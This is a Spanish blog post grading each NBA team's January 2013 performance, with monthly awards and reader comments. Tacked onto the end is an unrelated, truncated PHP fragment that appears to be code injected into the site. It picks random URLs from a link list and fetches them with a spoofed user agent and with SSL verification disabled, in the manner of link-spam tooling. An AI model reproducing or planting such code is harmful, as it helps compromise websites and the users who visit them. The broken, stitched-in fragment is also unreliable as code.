Informe #3: Enero 2013

27 de January de 2013 por TheDeerHunter

Revisamos méritos y deméritos en torno al primer mes de 2013, desde que hiciéramos el último repaso.

SOBRESALIENTE: 

Spurs (13-3): El juego de pase tejano maravilla. Merecido all-star para el dios Tim y para Parker. Si éramos pocos irrumpe Splitter como el gran interior que aquí sabemos que es. Preocupa el físico de Manudo y cierta tendencia a perder pegada lejos del Álamo.

Thunder (12-4): Con alguna de las mayores exhibiciones anotadoras de este curso por parte de Durantula, incluido su récord de puntos (52) adquiriendo ventaja para el MVP, el rendimiento all-star de Westbrook y la eclosión ofensiva de Ibaka, los Thunder dominan en este punto la liga. No es casualidad el mejor diferencial ataque-defensa. Pocas sombras.

Nets (11-4): Del muy deficiente a uno de los mejores del mes. Inmejorable inicio de la era Carlésimo, con tres derrotas difícilmente evitables en el feudo de rivales muy potentes. Mr. Bonobus no es santo de nuestra devoción, pero huele un poco raro la metamorfosis experimentada por Joe Johnson y Deron Williams. Alguno ya tiene experiencia en eso de hacer la cama al técnico jefe.

Nuggets (10-4): La marginación para el all-star no oculta los excelentes resultados que acumulan incluida la brillante victoria ante Thunder. Con la recuperación de Wilson Chandler, George Karl cuenta con una rotación 9 hombres efectivos, lo que lógicamente repercute en el brillo individual de cada uno. Colectivamente, sin embargo, son top5 en puntos, rebotes y asistencias. La defensa sigue siendo otro cantar nos tememos.

Jazz (9-4): Excelente Enero para los Jazz, a pesar de la derrota excesivamente fácil ante Lakers. Recordemos que Mo Will anda lesionado. Trabajo destacable de Tinsley en la dirección y un nivel de juego más que aceptable. Cómo está lanzando Foye.

NOTABLE:

Bulls (11-5): A estas alturas cobra especial significado el “all-in for D Rose”. Los rivales en el Este remoloneando y, mientras los Bulls se colocan a tiro de la cabeza. All-Star para Deng y Noah, más un rendimiento superlativo de Boozer este mes. Cuidado que vienen.

Heat (8-5): Algunas dudas en torno a los Campeones. El “flamante” (irónico) center all-star Chris Bosh lidera con menos de 6 rebotes la principal carencia. Todo repercute en una defensa que antaño fue el terror. Alguna victoria de mérito como la que lograron en Oakland ha maquillado un poco el panorama, así como el liderato de un Este un poquito bacalá, pero así no lograrían el repeat.

Grizzlies (10-6): No pintaba bien el panorama.  Cantos de traspaso de Rudy Gay por causas económicas  y cierto declive en el juego, especialmente en el ataque. Volviendo Arthur gusta bastante el traspaso de Speights, Ellington y Selby por Leuer para ajustar costes sin perder potencial. Toca centrarse en los resultados. Como guinda premio merecido para Zach.

Pacers (9-6): Lo de Paul George en Enero ha sido un escándalo. Ahí hay jugador franquicia, mucho más que lo fue Granger los últimos años. Decir que andan justos en ataque es un eufemismo, pero aún así no se pueden quejar del resultado. El primer equipo en casi una década (Nets 2005) con balance positivo siendo lo peor en ataque. Con todo, especialmente vulnerables lejos del Conseco.

Hornets (8-6): Con el equipo al completo llegan los resultados. Eric Gordon aporta la anotación que les faltaba. Robin ha bajado un punto, tras el sensacional inicio pero con todo ahora tienen mimbres para pelear bastantes victorias.

BIEN:

Clippers (8-7): Comprensible que ante algunas ausencias de Chris Paul los Clippers tropiecen en algún partido más de la cuenta. Alguno de ellos contra rivales de entidad. Yo no me preocuparía mucho, quedémonos con lo positivo. Tremendas noticias el rendimiento de los ex vecinos Barnes y Odom, así como la vuelta a las canchas de Grant Hill.

Bucks (8-7): Hecho insólito: primera victoria en Phoenix tras 26 años. Otro más, una década desde que uno de sus miembros (Redd 2004) fue all-star. La salida de Skiles promocionando a Jim Boylan ha supuesto aire fresco. Primera gran aportación ha sido el despertar de Ilyasova. Ya tocaba.

Blazers (8-7): Bastante mala suerte en la racha de 6 derrotas consecutivas por un estrecho margen. Mantienen un trastorno bipolar ganando a Heat, Knicks o Clippers y perdiendo contra Toronto o Wizards. También mantienen el abismo que hay entre el quinteto titular y la segunda unidad.

Pistons (6-5): No es nada habitual que en la Motown disfruten de tramos así de positivos. El mayor mérito de Lawrence Frank es haber logrado que defiendan de manera notable. El poderío de sus dos torres hace el resto. Victorias de mucho mérito ante Bucks, Celtics o Hawks.

Wizards (7-8): La vuelta de Wall coincide con una estupenda racha de 7 victorias en 10 partidos. Bradley Beal está jugando francamente bien y, además han recuperado a Jordan Crawford para la causa. No parece haber tanta dosis de “tanqueo” este curso. Se pone bonita hasta la cola de la liga.

APROBADO:

Rockets (8-9): Se les apagaron los plomos con 8 derrotas en los últimos 10, justo después de tocar el cielo humillando a los Lakers en el Toyota Center. La defensa en esta crisis de lo peorcito de la liga. Bajonazo de Lin y Asik, y el efecto “Barbas” comienza a disiparte un poco. Está la cosa como para dar vidilla a algunos monstruos que andan clasificados detrás de ellos.

Warriors (6-7): Calendario infernal. No les ha acompañado la suerte contra rivales directos y eso ha dado alas a los que no les toman en serio. Tremendamente ninguneados para el all-star de Houston. Hay que ajustar esa defensa o son carne de primera ronda. Además, los Nuggets les están comiendo mucho terreno.

Knicks (5-6): A la espera que Stat y Shumpert empiecen a dar lo mejor de sí, les siguen causando mucho daño las lesiones. Este mes Felton, Camby y el propio Rasheed. Lo mejor es que han jugado poco, que en el Este les aprietan poco y que Melo, Chandler y J.R. Smith siguen empeñados en vender muy cara la piel en cada ocasión que se presenta.

Hawks (7-9): Cierta crisis. Llegaron a sufrir una terrible racha de 3-9 que están tratando de dejar atrás, pero que les marca decisivamente la valoración del mes, y suponemos también ha si determinante en el castigo para el all-star. Demasiado ruido en torno a Josh Smith y no pinta demasiado bien el tema. Deméritos ajenos evitan males mayores.

Cavaliers (6-8): Un extraordinario Irving les ha llevado a ganar 4 de los últimos 5 (El 5º jugador menor de 21 que suma 30+ en 3 partidos consecutivos) Buen trabajo de los rookies y de Tristan Thompson. Tampoco pensemos que con los mimbres que tienen esto es lo que debería ser habitual en ellos.

SUSPENSO:

Mavericks (6-7): Demasiadas derrotas por escaso margen. Es posible que los Mavs no debieran haber recibido tanto castigo en su tabla de resultados. Vuelve Robin Hood para alcanzar un hito a su altura, devolver a los suyos a una lejana postemporada.

Raptors (6-8): Típico de los Raptors, que te levanten 4 puntos de ventaja en 8 segundos como ocurrió en Philadelphia. También perdieron en la prórroga ante cocos como Chicago y Miami. Es la diferencia entre hacerlo bien o regular-mal. Sacan petróleo de la intendencia, mientras valoran la posibilidad de traspasar figuras como Lowry o Bargnani.

Celtics (6-9): Alarmas encendidas en Boston, y eso que conservan plaza de postemporada. 6 derrotas consecutivas, con algunos atascos increíbles en ataque y los problemas habituales bajo tableros. A Garnett le regalan otra titularidad en el all-star. Siempre podría ser peor, que a Sixers o algún otro le dé por ganar algunos partidos seguidos. ¿Is this the end?

Kings (6-10): Demasiadas distracciones externas. Pensando más en el futuro de la franquicia y en su venta, que en el difícil calendario que han sufrido. Aun han cosechado dignos resultados, con una defensa inexistente, y distribución y rebote deficientes. Gran mes en lo individual de Cousins. No podemos destacar muchos aspectos positivos más.

Sixers (4-9): Ni el mediocre nivel de la cola del Este, ni la campaña all-star de Holliday logra hacer que se acerquen al objetivo. Necesitan más contribución de gente como Nick Young. La plantilla es demasiado justa.

MUY DEFICIENTE:

Bobcats (4-10): Lejos quedan los brotes verdes del inicio de curso. Ni atacan ni defienden bien. Para colmo lesión de Mullens… y Haywood vuelve por sus fueros de inutilidad. Mucha pereza verles en directo.

Wolves (4-11): En barrena. La lesión de larga duración de Love da al traste con todos los objetivos de la campaña. Ricky tampoco termina de arrancar y el equipo definitivamente presenta una tremenda falta de pegada. Lástima de temporadón de Pekovic y Kirilenko.

Lakers (3-10): Uno de los más grandes fracasos de la historia del deporte puede haberse gestado durante este mes de Enero. Unas madres en defensa, D’Antoni no ha logrado encontrar soluciones estables. Para colmo out of season de Jordan Hill y todo tipo de especulaciones que no benefician en nada a una hipotética recuperación. Todo es susceptible de empeorar… todavía más.

Suns (3-10): Los resultados mandan y el terrible calendario mandó a Gentry a la cola del paro. Desconozco quien creía que los Suns están capacitados para ganar muchos partidos a Thunder, Spurs, Bulls, Bucks, Nets, Grizzlies… o si Lindsey Hunter será capaz de sacar resultados de una plantilla con demasiadas carencias. Opino que su lugar bien puede ser la cola del Oeste.

Magic (2-11): Sufriendo y plantando cara siempre que han podido. De vez en cuando aún son capaces de amargarle la noche al más pintado, pero a perro flaco todo son pulgas y no están teniendo suerte en el aspecto físico. Mes más que digno de los que han estado sanos… que en realidad son 4 (Nelson, Afflalo, Reddick y Vucevic) El equipo ya era corto antes de la plaga bíblica de lesiones.

PREMIOS MENSUALES:

MVP: Anotando y pasando más que nunca no hay en el Oeste quien le discuta el premio a Durant. En el Este los candidatos serían LeBron, George y Carlos Boozer. Creo que por el papel y los resultados obtenidos habría que dárselo al de Indiana.

Rookie: De forma parecida no hay debate frente a Lillard. En el Este me quedaría o con Beal o con Anthony Davis. No soy capaz de decantarme por uno o por otro.

La Sorpresa: Un gran Enero para Ersan Ilyasova. Muchos le acusaban ya de cazo mix. Yo lo achacaba a otros factores. Le ha venido muy bien el cambio de técnico.

La decepción: Cuando preparábamos la pira para hacer una falla con Mr. Potato creíamos que todos los problemas desaparecerían. Os aseguro que personalmente tenía fe en que Mike D’Antoni iba a saber adaptar sus sistemas a la plantilla. No estoy del todo seguro ni que haya adaptado tampoco la plantilla a sus sistemas.

El mayor esfuerzo en vano: No soy sospechoso de que me ciegue la pasión por él. Diría que Jameer Nelson está jugando el mejor baloncesto de su carrera.  En concreto este mes ha firmado un sensacional 19.6 puntos, 8.3 asistencias, 3.5 rebotes y 1.6 robos. Tremendo.

Comenta

6 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Anthony Davis está en el oeste 🙂 en la sección de rookie del mes.

    Por lo demás bastante de acuerdo, una pena que Orlando haya perdido tantos partidos ajustados, igual que Raptors o Wolves, y eso influya en sus calificaciones del mes.

      Citar

  2. TheDeerHunter dice:
    #2

    Jose Luis:
    Anthony Davis está en el oeste :)en la sección de rookie del mes.

    Por lo demás bastante de acuerdo, una pena que Orlando haya perdido tantos partidos ajustados, igual que Raptors o Wolves, y eso influya en sus calificaciones del mes.

    Puff, vaya lapsus. XS
    Gracias por el apunte.

      Citar

  3. MagicJohnson32 dice:
    #3

    En el caso de los Sixers, entre la lesión de Rondo y los progresos que parece estar haciendo Bynum, el panorama se aclara un poco. Lo último que se comenta es que el pívot podría debutar incluso antes del All Star, y de ser así Philly sería un fijo en Playoffs. De hecho, incluso sin Bynum los Sixers deberían ganar más partidos.

    Y alucinante lo que ha supuesto para Ilyasova el cambio de entrenador. ¿¿¿Puede que alguien le haya explicado que cuando despiden al coach tienes que volver a ganarte el contrato???

      Citar

  4. Jose Luis dice:
    #4

    Ilyasova lleva jugando bien desde principios diciembre, sino míralo en la Hoops xD

      Citar

  5. MagicJohnson32 dice:
    #5

    Jose Luis:
    Ilyasova lleva jugando bien desde principios diciembre, sino míralo en la Hoops xD

    A principios de diciembre Ilyasova tuvo dos partidos buenos y tres o cuatro decentes, pero fue un espejismo y volvió a las andadas. Sus últimos 4 partidos, en cambio, son tremendos, a su mejor nivel del año pasado.

      Citar

  6. GreenPride dice:
    #6

    Gran análisis del mes que ha traido principalmente el descalabro de los Lakers que les complica mucho su entrada en PO.
    Subiría a sobresaliente a los Bulls que están haciendo un temporadón y a bien a los Cavs con lo que tienen demasiado buen record y suspendería a los Hawks que han hecho un mes muy malo pero en general muy de acuerdo con todo.
    Magic, lo de que si vuelve Bynum los Sixers hacen PO seguro está muy por ver… nunca hay que despreciar el orgullo verde y veremos en qué condiciones vuelve Bynum y cómo se adapta el equipo a jugar con él teniendo en cuenta que llevan mucho tiempo jugando sin referencia interior.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>